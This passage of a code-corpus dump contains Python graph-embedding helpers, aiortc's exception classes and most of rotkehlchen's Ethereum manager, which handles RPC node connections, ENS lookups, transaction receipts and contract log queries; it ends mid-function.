embedding_look_up[node_id] = list(emb)
assert int(node_num) == len(embedding_look_up)
f.close()
return embedding_look_up
def read_node_labels(filename):
fin = open(filename, 'r')
node_list = []
labels = []
while 1:
l = fin.readline()
if l == '':
break
vec = l.strip().split()
node_list.append(vec[0])
labels.append(vec[1:])
fin.close()
print('Nodes with labels: %s'%len(node_list))
return node_list, labels
def split_train_test_classify(embedding_look_up, X, Y, seed, testing_ratio=0.2):
state = np.random.get_state()
training_ratio = 1 - testing_ratio
training_size = int(training_ratio * len(X))
np.random.seed(seed)
shuffle_indices = np.random.permutation(np.arange(len(X)))
X_train = [embedding_look_up[X[shuffle_indices[i]]] for i in range(training_size)]
Y_train = [Y[shuffle_indices[i]] for i in range(training_size)]
X_test = [embedding_look_up[X[shuffle_indices[i]]] for i in range(training_size, len(X))]
Y_test = [Y[shuffle_indices[i]] for i in range(training_size, len(X))]
X_train = np.array(X_train)
Y_train = np.array(Y_train)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
np.random.set_state(state)
return X_train, Y_train, X_test, Y_test
def get_y_pred(y_test, y_pred_prob):
y_pred = np.zeros(y_pred_prob.shape)
sort_index = np.flip(np.argsort(y_pred_prob, axis=1), 1)
for i in range(y_test.shape[0]):
num = np.sum(y_test[i])
for j in range(num):
y_pred[i][sort_index[i][j]] = 1
return y_pred
|
src/aiortc/exceptions.py
|
thedilletante/aiortc
| 1,021 |
85491
|
class InternalError(Exception):
pass
class InvalidAccessError(Exception):
pass
class InvalidStateError(Exception):
pass
|
rotkehlchen/chain/ethereum/manager.py
|
rotkehlchenio/rotkehlchen
| 137 |
85519
|
import json
import logging
import random
from typing import Any, Callable, Dict, List, Literal, Optional, Sequence, Tuple, Union, overload
from urllib.parse import urlparse
import requests
from ens import ENS
from ens.abis import ENS as ENS_ABI, RESOLVER as ENS_RESOLVER_ABI
from ens.exceptions import InvalidName
from ens.main import ENS_MAINNET_ADDR
from ens.utils import (
address_to_reverse_domain,
is_none_or_zero_address,
normal_name_to_hash,
normalize_name,
)
from eth_typing import BlockNumber, HexStr
from web3 import HTTPProvider, Web3
from web3._utils.abi import get_abi_output_types
from web3._utils.contracts import find_matching_event_abi
from web3._utils.filters import construct_event_filter_params
from web3.datastructures import MutableAttributeDict
from web3.exceptions import (
BadFunctionCallOutput,
BadResponseFormat,
BlockNotFound,
TransactionNotFound,
)
from web3.types import BlockIdentifier, FilterParams
from rotkehlchen.chain.constants import DEFAULT_EVM_RPC_TIMEOUT
from rotkehlchen.chain.ethereum.contracts import EthereumContract
from rotkehlchen.chain.ethereum.graph import Graph
from rotkehlchen.chain.ethereum.modules.eth2.constants import ETH2_DEPOSIT
from rotkehlchen.chain.ethereum.types import EnsContractParams, string_to_ethereum_address
from rotkehlchen.chain.ethereum.utils import multicall, multicall_2
from rotkehlchen.constants.ethereum import ERC20TOKEN_ABI, ETH_SCAN, UNIV1_LP_ABI
from rotkehlchen.errors.misc import (
BlockchainQueryError,
InputError,
RemoteError,
UnableToDecryptRemoteData,
)
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.externalapis.etherscan import Etherscan
from rotkehlchen.fval import FVal
from rotkehlchen.greenlets import GreenletManager
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_ethereum_address,
deserialize_ethereum_transaction,
deserialize_int_from_hex,
)
from rotkehlchen.serialization.serialize import process_result
from rotkehlchen.types import (
ChecksumEthAddress,
EthereumTransaction,
EVMTxHash,
SupportedBlockchain,
Timestamp,
)
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.misc import from_wei, hex_or_bytes_to_str
from rotkehlchen.utils.network import request_get_dict
from .types import NodeName
from .utils import ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
def _is_synchronized(current_block: int, latest_block: int) -> Tuple[bool, str]:
""" Validate that the ethereum node is synchronized
within 20 blocks of latest block
Returns a tuple (results, message)
- result: Boolean for confirmation of synchronized
- message: A message containing information on what the status is.
"""
message = ''
if current_block < (latest_block - 20):
message = (
f'Found ethereum node but it is out of sync. {current_block} / '
f'{latest_block}. Will use etherscan.'
)
log.warning(message)
return False, message
return True, message
WEB3_LOGQUERY_BLOCK_RANGE = 250000
def _query_web3_get_logs(
web3: Web3,
filter_args: FilterParams,
from_block: int,
to_block: Union[int, Literal['latest']],
contract_address: ChecksumEthAddress,
event_name: str,
argument_filters: Dict[str, Any],
) -> List[Dict[str, Any]]:
until_block = web3.eth.block_number if to_block == 'latest' else to_block
events: List[Dict[str, Any]] = []
start_block = from_block
# we know that in most of its early life the Eth2 contract address returns a
# a lot of results. So limit the query range to not hit the infura limits every time
# supress https://lgtm.com/rules/1507386916281/ since it does not apply here
infura_eth2_log_query = (
'infura.io' in web3.manager.provider.endpoint_uri and # type: ignore # noqa: E501 lgtm [py/incomplete-url-substring-sanitization]
contract_address == ETH2_DEPOSIT.address
)
block_range = initial_block_range = WEB3_LOGQUERY_BLOCK_RANGE
if infura_eth2_log_query:
block_range = initial_block_range = 75000
while start_block <= until_block:
filter_args['fromBlock'] = start_block
end_block = min(start_block + block_range, until_block)
filter_args['toBlock'] = end_block
log.debug(
'Querying web3 node for contract event',
contract_address=contract_address,
event_name=event_name,
argument_filters=argument_filters,
from_block=filter_args['fromBlock'],
to_block=filter_args['toBlock'],
)
# As seen in https://github.com/rotki/rotki/issues/1787, the json RPC, if it
# is infura can throw an error here which we can only parse by catching the exception
try:
new_events_web3: List[Dict[str, Any]] = [dict(x) for x in web3.eth.get_logs(filter_args)] # noqa: E501
except (ValueError, KeyError) as e:
if isinstance(e, ValueError):
try:
decoded_error = json.loads(str(e).replace("'", '"'))
except json.JSONDecodeError:
# reraise the value error if the error is not json
raise e from None
msg = decoded_error.get('message', '')
else: # temporary hack for key error seen from pokt
msg = 'query returned more than 10000 results'
# errors from: https://infura.io/docs/ethereum/json-rpc/eth-getLogs
if msg in ('query returned more than 10000 results', 'query timeout exceeded'):
block_range = block_range // 2
if block_range < 50:
raise # stop retrying if block range gets too small
# repeat the query with smaller block range
continue
# else, well we tried .. reraise the error
raise e
# Turn all HexBytes into hex strings
for e_idx, event in enumerate(new_events_web3):
new_events_web3[e_idx]['blockHash'] = event['blockHash'].hex()
new_topics = []
for topic in event['topics']:
new_topics.append(topic.hex())
new_events_web3[e_idx]['topics'] = new_topics
new_events_web3[e_idx]['transactionHash'] = event['transactionHash'].hex()
start_block = end_block + 1
events.extend(new_events_web3)
# end of the loop, end of 1 query. Reset the block range to max
block_range = initial_block_range
return events
def _prepare_ens_call_arguments(addr: ChecksumEthAddress) -> List[Any]:
try:
reversed_domain = address_to_reverse_domain(addr)
except (TypeError, ValueError) as e:
raise InputError(f'Address {addr} has incorrect format or type. {str(e)}') from e
normalized_domain_name = normalize_name(reversed_domain)
arguments = [normal_name_to_hash(normalized_domain_name)]
return arguments
def _encode_ens_contract(params: EnsContractParams) -> str:
contract = EthereumContract(address=params.address, abi=params.abi, deployed_block=0)
return contract.encode(method_name=params.method_name, arguments=params.arguments)
def _decode_ens_contract(params: EnsContractParams, result_encoded: Any) -> ChecksumEthAddress:
contract = EthereumContract(address=params.address, abi=params.abi, deployed_block=0)
result = contract.decode( # pylint: disable=E1136
result=result_encoded,
method_name=params.method_name,
arguments=params.arguments,
)[0]
return string_to_ethereum_address(result)
# TODO: Ideally all these should become configurable
# Taking LINKPOOL out since it's just really too slow and seems to not
# respond to the batched calls almost at all. Combined with web3.py retries
# this makes the tokens balance queries super slow.
OPEN_NODES = (
NodeName.MYCRYPTO,
NodeName.BLOCKSCOUT,
NodeName.AVADO_POOL,
NodeName.ONEINCH,
NodeName.MYETHERWALLET,
# NodeName.LINKPOOL,
NodeName.CLOUDFLARE_ETH,
NodeName.ETHERSCAN,
)
ETHEREUM_NODES_TO_CONNECT_AT_START = (
NodeName.OWN,
NodeName.MYCRYPTO,
NodeName.BLOCKSCOUT,
NodeName.ONEINCH,
NodeName.AVADO_POOL,
NodeName.ONEINCH,
NodeName.MYETHERWALLET,
# NodeName.LINKPOOL,
NodeName.CLOUDFLARE_ETH,
)
OPEN_NODES_WEIGHT_MAP = { # Probability with which to select each node
NodeName.ETHERSCAN: 0.3,
NodeName.MYCRYPTO: 0.15,
NodeName.BLOCKSCOUT: 0.1,
NodeName.AVADO_POOL: 0.05,
NodeName.ONEINCH: 0.15,
NodeName.MYETHERWALLET: 0.15,
# NodeName.LINKPOOL: 0.05,
NodeName.CLOUDFLARE_ETH: 0.1,
}
class EthereumManager():
def __init__(
self,
ethrpc_endpoint: str,
etherscan: Etherscan,
msg_aggregator: MessagesAggregator,
greenlet_manager: GreenletManager,
connect_at_start: Sequence[NodeName],
eth_rpc_timeout: int = DEFAULT_EVM_RPC_TIMEOUT,
) -> None:
log.debug(f'Initializing Ethereum Manager with own rpc endpoint: {ethrpc_endpoint}')
self.greenlet_manager = greenlet_manager
self.web3_mapping: Dict[NodeName, Web3] = {}
self.own_rpc_endpoint = ethrpc_endpoint
self.etherscan = etherscan
self.msg_aggregator = msg_aggregator
self.eth_rpc_timeout = eth_rpc_timeout
self.archive_connection = False
self.queried_archive_connection = False
for node in connect_at_start:
self.greenlet_manager.spawn_and_track(
after_seconds=None,
task_name=f'Attempt connection to {str(node)} ethereum node',
exception_is_error=True,
method=self.attempt_connect,
name=node,
ethrpc_endpoint=node.endpoint(self.own_rpc_endpoint),
mainnet_check=True,
)
self.blocks_subgraph = Graph(
'https://api.thegraph.com/subgraphs/name/blocklytics/ethereum-blocks',
)
# A cache for the erc20 contract info to not requery same one
self.contract_info_cache: Dict[ChecksumEthAddress, Dict[str, Any]] = {}
def connected_to_any_web3(self) -> bool:
return (
NodeName.OWN in self.web3_mapping or
NodeName.MYCRYPTO in self.web3_mapping or
NodeName.BLOCKSCOUT in self.web3_mapping or
NodeName.AVADO_POOL in self.web3_mapping
)
def default_call_order(self, skip_etherscan: bool = False) -> List[NodeName]:
"""Default call order for ethereum nodes
Own node always has preference. Then all other node types are randomly queried
in sequence depending on a weighted probability.
Some benchmarks on weighted probability based random selection when compared
to simple random selection. Benchmark was on blockchain balance querying with
29 ethereum accounts and at the time 1010 different ethereum tokens.
With weights: etherscan: 0.5, mycrypto: 0.25, blockscout: 0.2, avado: 0.05
===> Runs: 66, 58, 60, 68, 58 seconds
---> Average: 62 seconds
- Without weights
===> Runs: 66, 82, 72, 58, 72 seconds
---> Average: 70 seconds
"""
result = []
if NodeName.OWN in self.web3_mapping:
result.append(NodeName.OWN)
selection = list(OPEN_NODES)
if skip_etherscan:
selection.remove(NodeName.ETHERSCAN)
ordered_list = []
while len(selection) != 0:
weights = []
for entry in selection:
weights.append(OPEN_NODES_WEIGHT_MAP[entry])
node = random.choices(selection, weights, k=1)
ordered_list.append(node[0])
selection.remove(node[0])
return result + ordered_list
def attempt_connect(
self,
name: NodeName,
ethrpc_endpoint: str,
mainnet_check: bool = True,
) -> Tuple[bool, str]:
"""Attempt to connect to a particular node type
For our own node if the given rpc endpoint is not the same as the saved one
the connection is re-attempted to the new one
"""
message = ''
node_connected = self.web3_mapping.get(name, None) is not None
own_node_already_connected = (
name == NodeName.OWN and
self.own_rpc_endpoint == ethrpc_endpoint and
node_connected
)
if own_node_already_connected or (node_connected and name != NodeName.OWN):
return True, 'Already connected to an ethereum node'
try:
parsed_eth_rpc_endpoint = urlparse(ethrpc_endpoint)
if not parsed_eth_rpc_endpoint.scheme:
ethrpc_endpoint = f"http://{ethrpc_endpoint}"
provider = HTTPProvider(
endpoint_uri=ethrpc_endpoint,
request_kwargs={'timeout': self.eth_rpc_timeout},
)
ens = ENS(provider)
web3 = Web3(provider, ens=ens)
except requests.exceptions.RequestException:
message = f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'
log.warning(message)
return False, message
try:
is_connected = web3.isConnected()
except AssertionError:
# Terrible, terrible hack but needed due to https://github.com/rotki/rotki/issues/1817
is_connected = False
if is_connected:
# Also make sure we are actually connected to the Ethereum mainnet
synchronized = True
msg = ''
try:
if mainnet_check:
network_id = int(web3.net.version)
if network_id != 1:
message = (
f'Connected to ethereum node {name} at endpoint {ethrpc_endpoint} but '
f'it is not on the ethereum mainnet. The chain id '
f'the node is in is {network_id}.'
)
log.warning(message)
return False, message
try:
current_block = web3.eth.block_number # pylint: disable=no-member
latest_block = self.query_eth_highest_block()
except (requests.exceptions.RequestException, RemoteError) as e:
msg = f'Could not query latest block due to {str(e)}'
log.warning(msg)
synchronized = False
else:
synchronized, msg = _is_synchronized(current_block, latest_block)
except ValueError as e:
message = (
f'Failed to connect to ethereum node {name} at endpoint '
f'{ethrpc_endpoint} due to {str(e)}'
)
return False, message
if not synchronized:
self.msg_aggregator.add_warning(
f'We could not verify that ethereum node {name} is '
'synchronized with the ethereum mainnet. Balances and other queries '
'may be incorrect.',
)
log.info(f'Connected ethereum node {name} at {ethrpc_endpoint}')
self.web3_mapping[name] = web3
return True, ''
# else
message = f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'
log.warning(message)
return False, message
def set_rpc_endpoint(self, endpoint: str) -> Tuple[bool, str]:
""" Attempts to set the RPC endpoint for the user's own ethereum node
Returns a tuple (result, message)
- result: Boolean for success or failure of changing the rpc endpoint
- message: A message containing information on what happened. Can
be populated both in case of success or failure"""
if endpoint == '':
self.web3_mapping.pop(NodeName.OWN, None)
self.own_rpc_endpoint = ''
return True, ''
# else
result, message = self.attempt_connect(name=NodeName.OWN, ethrpc_endpoint=endpoint)
if result:
log.info('Setting own node ETH RPC endpoint', endpoint=endpoint)
self.own_rpc_endpoint = endpoint
return result, message
def query(self, method: Callable, call_order: Sequence[NodeName], **kwargs: Any) -> Any:
"""Queries ethereum related data by performing the provided method to all given nodes
The first node in the call order that gets a succcesful response returns.
If none get a result then a remote error is raised
"""
for node in call_order:
web3 = self.web3_mapping.get(node, None)
if web3 is None and node != NodeName.ETHERSCAN:
continue
try:
result = method(web3, **kwargs)
except (
RemoteError,
requests.exceptions.RequestException,
BlockchainQueryError,
TransactionNotFound,
BlockNotFound,
BadResponseFormat,
ValueError, # Yabir saw this happen with mew node for unavailable method at node. Since it's generic we should replace if web3 implements https://github.com/ethereum/web3.py/issues/2448 # noqa: E501
) as e:
log.warning(f'Failed to query {node} for {str(method)} due to {str(e)}')
# Catch all possible errors here and just try next node call
continue
return result
# no node in the call order list was succesfully queried
raise RemoteError(
f'Failed to query {str(method)} after trying the following '
f'nodes: {[str(x) for x in call_order]}. Check logs for details.',
)
def _get_latest_block_number(self, web3: Optional[Web3]) -> int:
if web3 is not None:
return web3.eth.block_number
# else
return self.etherscan.get_latest_block_number()
def get_latest_block_number(self, call_order: Optional[Sequence[NodeName]] = None) -> int:
return self.query(
method=self._get_latest_block_number,
call_order=call_order if call_order is not None else self.default_call_order(),
)
def get_historical_eth_balance(
self,
address: ChecksumEthAddress,
block_number: int,
) -> Optional[FVal]:
"""Attempts to get a historical eth balance from the local own node only.
If there is no node or the node can't query historical balance (not archive) then
returns None"""
web3 = self.web3_mapping.get(NodeName.OWN)
if web3 is None:
return None
try:
result = web3.eth.get_balance(address, block_identifier=block_number)
except (
requests.exceptions.RequestException,
BlockchainQueryError,
KeyError, # saw this happen inside web3.py if resulting json contains unexpected key. Happened with mycrypto's node # noqa: E501
):
return None
try:
balance = from_wei(FVal(result))
except ValueError:
return None
return balance
def have_archive(self, requery: bool = False) -> bool:
"""Checks to see if our own connected node is an archive node
If requery is True it always queries the node. Otherwise it remembers last query.
"""
if self.queried_archive_connection and requery is False:
return self.archive_connection
balance = self.get_historical_eth_balance(
address=string_to_ethereum_address('0x50532e4Be195D1dE0c2E6DfA46D9ec0a4Fee6861'),
block_number=87042,
)
self.archive_connection = balance is not None and balance == FVal('5.1063307')
self.queried_archive_connection = True
return self.archive_connection
def query_eth_highest_block(self) -> BlockNumber:
""" Attempts to query an external service for the block height
Returns the highest blockNumber
May Raise RemoteError if querying fails
"""
url = 'https://api.blockcypher.com/v1/eth/main'
log.debug('Querying blockcypher for ETH highest block', url=url)
eth_resp: Optional[Dict[str, str]]
try:
eth_resp = request_get_dict(url)
except (RemoteError, UnableToDecryptRemoteData, requests.exceptions.RequestException):
eth_resp = None
block_number: Optional[int]
if eth_resp and 'height' in eth_resp:
block_number = int(eth_resp['height'])
log.debug('ETH highest block result', block=block_number)
else:
block_number = self.etherscan.get_latest_block_number()
log.debug('ETH highest block result', block=block_number)
return BlockNumber(block_number)
def get_eth_balance(self, account: ChecksumEthAddress) -> FVal:
"""Gets the balance of the given account in ETH
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""
result = self.get_multieth_balance([account])
return result[account]
def get_multieth_balance(
self,
accounts: List[ChecksumEthAddress],
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[ChecksumEthAddress, FVal]:
"""Returns a dict with keys being accounts and balances in ETH
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
"""
balances: Dict[ChecksumEthAddress, FVal] = {}
log.debug(
'Querying ethereum chain for ETH balance',
eth_addresses=accounts,
)
result = ETH_SCAN.call(
ethereum=self,
method_name='etherBalances',
arguments=[accounts],
call_order=call_order if call_order is not None else self.default_call_order(),
)
balances = {}
for idx, account in enumerate(accounts):
balances[account] = from_wei(result[idx])
return balances
def get_block_by_number(
self,
num: int,
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[str, Any]:
return self.query(
method=self._get_block_by_number,
call_order=call_order if call_order is not None else self.default_call_order(),
num=num,
)
def _get_block_by_number(self, web3: Optional[Web3], num: int) -> Dict[str, Any]:
"""Returns the block object corresponding to the given block number
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
- BlockNotFound if number used to lookup the block can't be found. Raised
by web3.eth.get_block().
"""
if web3 is None:
return self.etherscan.get_block_by_number(num)
block_data: MutableAttributeDict = MutableAttributeDict(web3.eth.get_block(num)) # type: ignore # pylint: disable=no-member # noqa: E501
block_data['hash'] = hex_or_bytes_to_str(block_data['hash'])
return dict(block_data)
def get_code(
self,
account: ChecksumEthAddress,
call_order: Optional[Sequence[NodeName]] = None,
) -> str:
return self.query(
method=self._get_code,
call_order=call_order if call_order is not None else self.default_call_order(),
account=account,
)
def _get_code(self, web3: Optional[Web3], account: ChecksumEthAddress) -> str:
"""Gets the deployment bytecode at the given address
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""
if web3 is None:
return self.etherscan.get_code(account)
return hex_or_bytes_to_str(web3.eth.getCode(account))
def ens_reverse_lookup(self, reversed_addresses: List[ChecksumEthAddress]) -> Dict[ChecksumEthAddress, Optional[str]]: # noqa: E501
"""Performs a reverse ENS lookup on a list of addresses
Because a multicall is used, no exceptions are raised.
If any exceptions occur, they are logged and None is returned for that
"""
human_names: Dict[ChecksumEthAddress, Optional[str]] = {}
# Querying resolvers' addresses
resolver_params = [
EnsContractParams(address=addr, abi=ENS_ABI, method_name='resolver', arguments=_prepare_ens_call_arguments(addr)) # noqa: E501
for addr in reversed_addresses
]
resolvers_output = multicall(
ethereum=self,
calls=[(ENS_MAINNET_ADDR, _encode_ens_contract(params=params)) for params in resolver_params], # noqa: E501
)
resolvers = []
# We need a new list for reversed_addresses because not all addresses have resolver
filtered_reversed_addresses = []
# Processing resolvers query output
for reversed_addr, params, resolver_output in zip(reversed_addresses, resolver_params, resolvers_output): # noqa: E501
decoded_resolver = _decode_ens_contract(params=params, result_encoded=resolver_output)
if is_none_or_zero_address(decoded_resolver):
human_names[reversed_addr] = None
continue
try:
deserialized_resolver = deserialize_ethereum_address(decoded_resolver)
except DeserializationError:
log.error(
f'Error deserializing address {decoded_resolver} while doing reverse ens lookup', # noqa: E501
)
human_names[reversed_addr] = None
continue
resolvers.append(deserialized_resolver)
filtered_reversed_addresses.append(reversed_addr)
# Querying human names
human_names_params = [
EnsContractParams(address=resolver, abi=ENS_RESOLVER_ABI, method_name='name', arguments=_prepare_ens_call_arguments(addr)) # noqa: E501
for addr, resolver in zip(filtered_reversed_addresses, resolvers)]
human_names_output = multicall(
ethereum=self,
calls=[(params.address, _encode_ens_contract(params=params)) for params in human_names_params], # noqa: E501
)
# Processing human names query output
for addr, params, human_name_output in zip(filtered_reversed_addresses, human_names_params, human_names_output): # noqa: E501
human_names[addr] = _decode_ens_contract(params=params, result_encoded=human_name_output) # noqa: E501
return human_names
@overload
def ens_lookup(
self,
name: str,
blockchain: Literal[SupportedBlockchain.ETHEREUM] = SupportedBlockchain.ETHEREUM,
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[ChecksumEthAddress]:
...
@overload
def ens_lookup(
self,
name: str,
blockchain: Literal[
SupportedBlockchain.BITCOIN,
SupportedBlockchain.KUSAMA,
SupportedBlockchain.POLKADOT,
],
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[HexStr]:
...
def ens_lookup(
self,
name: str,
blockchain: SupportedBlockchain = SupportedBlockchain.ETHEREUM,
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[Union[ChecksumEthAddress, HexStr]]:
return self.query(
method=self._ens_lookup,
call_order=call_order if call_order is not None else self.default_call_order(),
name=name,
blockchain=blockchain,
)
@overload
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: Literal[SupportedBlockchain.ETHEREUM],
) -> Optional[ChecksumEthAddress]:
...
@overload
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: Literal[
SupportedBlockchain.BITCOIN,
SupportedBlockchain.KUSAMA,
SupportedBlockchain.POLKADOT,
],
) -> Optional[HexStr]:
...
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: SupportedBlockchain = SupportedBlockchain.ETHEREUM,
) -> Optional[Union[ChecksumEthAddress, HexStr]]:
"""Performs an ENS lookup and returns address if found else None
TODO: currently web3.py 5.15.0 does not support multichain ENS domains
(EIP-2304), therefore requesting a non-Ethereum address won't use the
web3 ens library and will require to extend the library resolver ABI.
An issue in their repo (#1839) reporting the lack of support has been
created. This function will require refactoring once they include
support for EIP-2304.
https://github.com/ethereum/web3.py/issues/1839
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
- InputError if the given name is not a valid ENS name
"""
try:
normal_name = normalize_name(name)
except InvalidName as e:
raise InputError(str(e)) from e
resolver_addr = self._call_contract(
web3=web3,
contract_address=ENS_MAINNET_ADDR,
abi=ENS_ABI,
method_name='resolver',
arguments=[normal_name_to_hash(normal_name)],
)
if is_none_or_zero_address(resolver_addr):
return None
ens_resolver_abi = ENS_RESOLVER_ABI.copy()
arguments = [normal_name_to_hash(normal_name)]
if blockchain != SupportedBlockchain.ETHEREUM:
ens_resolver_abi.extend(ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS)
arguments.append(blockchain.ens_coin_type())
try:
deserialized_resolver_addr = deserialize_ethereum_address(resolver_addr)
except DeserializationError:
log.error(
f'Error deserializing address {resolver_addr} while doing'
f'ens lookup',
)
return None
address = self._call_contract(
web3=web3,
contract_address=deserialized_resolver_addr,
abi=ens_resolver_abi,
method_name='addr',
arguments=arguments,
)
if is_none_or_zero_address(address):
return None
if blockchain != SupportedBlockchain.ETHEREUM:
return HexStr(address.hex())
try:
return deserialize_ethereum_address(address)
except DeserializationError:
log.error(f'Error deserializing address {address}')
return None
def _call_contract_etherscan(
self,
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
) -> Any:
"""Performs an eth_call to an ethereum contract via etherscan
May raise:
- RemoteError if there is a problem with
reaching etherscan or with the returned result
"""
web3 = Web3()
contract = web3.eth.contract(address=contract_address, abi=abi)
input_data = contract.encodeABI(method_name, args=arguments if arguments else [])
result = self.etherscan.eth_call(
to_address=contract_address,
input_data=input_data,
)
if result == '0x':
raise BlockchainQueryError(
f'Error doing call on contract {contract_address} for {method_name} '
f'with arguments: {str(arguments)} via etherscan. Returned 0x result',
)
fn_abi = contract._find_matching_fn_abi(
fn_identifier=method_name,
args=arguments,
)
output_types = get_abi_output_types(fn_abi)
output_data = web3.codec.decode_abi(output_types, bytes.fromhex(result[2:]))
if len(output_data) == 1:
# due to https://github.com/PyCQA/pylint/issues/4114
return output_data[0] # pylint: disable=unsubscriptable-object
return output_data
def _get_transaction_receipt(
self,
web3: Optional[Web3],
tx_hash: EVMTxHash,
) -> Dict[str, Any]:
if web3 is None:
tx_receipt = self.etherscan.get_transaction_receipt(tx_hash)
try:
# Turn hex numbers to int
block_number = int(tx_receipt['blockNumber'], 16)
tx_receipt['blockNumber'] = block_number
tx_receipt['cumulativeGasUsed'] = int(tx_receipt['cumulativeGasUsed'], 16)
tx_receipt['gasUsed'] = int(tx_receipt['gasUsed'], 16)
tx_receipt['status'] = int(tx_receipt.get('status', '0x1'), 16)
tx_index = int(tx_receipt['transactionIndex'], 16)
tx_receipt['transactionIndex'] = tx_index
for receipt_log in tx_receipt['logs']:
receipt_log['blockNumber'] = block_number
receipt_log['logIndex'] = deserialize_int_from_hex(
symbol=receipt_log['logIndex'],
location='etherscan tx receipt',
)
receipt_log['transactionIndex'] = tx_index
except (DeserializationError, ValueError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'missing key {msg}'
log.error(
f'Couldnt deserialize transaction receipt {tx_receipt} data from '
f'etherscan due to {msg}',
)
raise RemoteError(
f'Couldnt deserialize transaction receipt data from etherscan '
f'due to {msg}. Check logs for details',
) from e
return tx_receipt
# Can raise TransactionNotFound if the user's node is pruned and transaction is old
tx_receipt = web3.eth.get_transaction_receipt(tx_hash) # type: ignore
return process_result(tx_receipt)
def get_transaction_receipt(
self,
tx_hash: EVMTxHash,
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[str, Any]:
return self.query(
method=self._get_transaction_receipt,
call_order=call_order if call_order is not None else self.default_call_order(),
tx_hash=tx_hash,
)
def _get_transaction_by_hash(
self,
web3: Optional[Web3],
tx_hash: EVMTxHash,
) -> EthereumTransaction:
if web3 is None:
tx_data = self.etherscan.get_transaction_by_hash(tx_hash=tx_hash)
else:
tx_data = web3.eth.get_transaction(tx_hash) # type: ignore
try:
transaction = deserialize_ethereum_transaction(data=tx_data, internal=False, ethereum=self) # noqa: E501
except (DeserializationError, ValueError) as e:
raise RemoteError(
f'Couldnt deserialize ethereum transaction data from {tx_data}. Error: {str(e)}',
) from e
return transaction
def get_transaction_by_hash(
self,
tx_hash: EVMTxHash,
call_order: Optional[Sequence[NodeName]] = None,
) -> EthereumTransaction:
return self.query(
method=self._get_transaction_by_hash,
call_order=call_order if call_order is not None else self.default_call_order(),
tx_hash=tx_hash,
)
def call_contract(
self,
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
call_order: Optional[Sequence[NodeName]] = None,
block_identifier: BlockIdentifier = 'latest',
) -> Any:
return self.query(
method=self._call_contract,
call_order=call_order if call_order is not None else self.default_call_order(),
contract_address=contract_address,
abi=abi,
method_name=method_name,
arguments=arguments,
block_identifier=block_identifier,
)
def _call_contract(
self,
web3: Optional[Web3],
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
block_identifier: BlockIdentifier = 'latest',
) -> Any:
"""Performs an eth_call to an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
- BlockchainQueryError if web3 is used and there is a VM execution error
"""
if web3 is None:
return self._call_contract_etherscan(
contract_address=contract_address,
abi=abi,
method_name=method_name,
arguments=arguments,
)
contract = web3.eth.contract(address=contract_address, abi=abi)
try:
method = getattr(contract.caller(block_identifier=block_identifier), method_name)
result = method(*arguments if arguments else [])
except (ValueError, BadFunctionCallOutput) as e:
raise BlockchainQueryError(
f'Error doing call on contract {contract_address}: {str(e)}',
) from e
return result
def get_logs(
self,
contract_address: ChecksumEthAddress,
abi: List,
event_name: str,
argument_filters: Dict[str, Any],
from_block: int,
to_block: Union[int, Literal['latest']] = 'latest',
call_order: Optional[Sequence[NodeName]] = None,
) -> List[Dict[str, Any]]:
if call_order is None: # Default call order for logs
call_order = (NodeName.OWN, NodeName.ETHERSCAN)
return self.query(
method=self._get_logs,
call_order=call_order,
contract_address=contract_address,
abi=abi,
event_name=event_name,
argument_filters=argument_filters,
from_block=from_block,
to_block=to_block,
)
def _get_logs(
self,
web3: Optional[Web3],
contract_address: ChecksumEthAddress,
abi: List,
event_name: str,
argument_filters: Dict[str, Any],
from_block: int,
to_block: Union[int, Literal['latest']] = 'latest',
) -> List[Dict[str, Any]]:
"""Queries logs of an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
"""
event_abi = find_matching_event_abi(abi=abi, event_name=event_name)
_, filter_args = construct_event_filter_params(
event_abi=event_abi,
abi_codec=Web3().codec,
contract_address=contract_address,
argument_filters=argument_filters,
fromBlock=from_block,
toBlock=to_block,
)
if event_abi['anonymous']:
# web3.py does not handle the anonymous events correctly and adds the first topic
filter_args['topics'] = filter_args['topics'][1:]
events: List[Dict[str, Any]] = []
start_block = from_block
if web3 is not None:
events = _query_web3_get_logs(
web3=web3,
filter_args=filter_args,
from_block=from_block,
to_block=to_block,
contract_address=contract_address,
event_name=event_name,
argument_filters=argument_filters,
)
else: # etherscan
until_block = (
self.etherscan.get_latest_block_number() if to_block == 'latest' else to_block
)
blocks_step = 300000
while start_block <= until_block:
while True: # loop to continuously reduce block range if need b
end_block = min(start_block + blocks_step, until_block)
try:
new_events = self.etherscan.get_logs(
contract_address=contract_address,
topics=filter_args['topics'], # type: ignore
from_block=start_block,
to_block=end_block,
)
except RemoteError as e:
if 'Please select a smaller result dataset' in str(e):
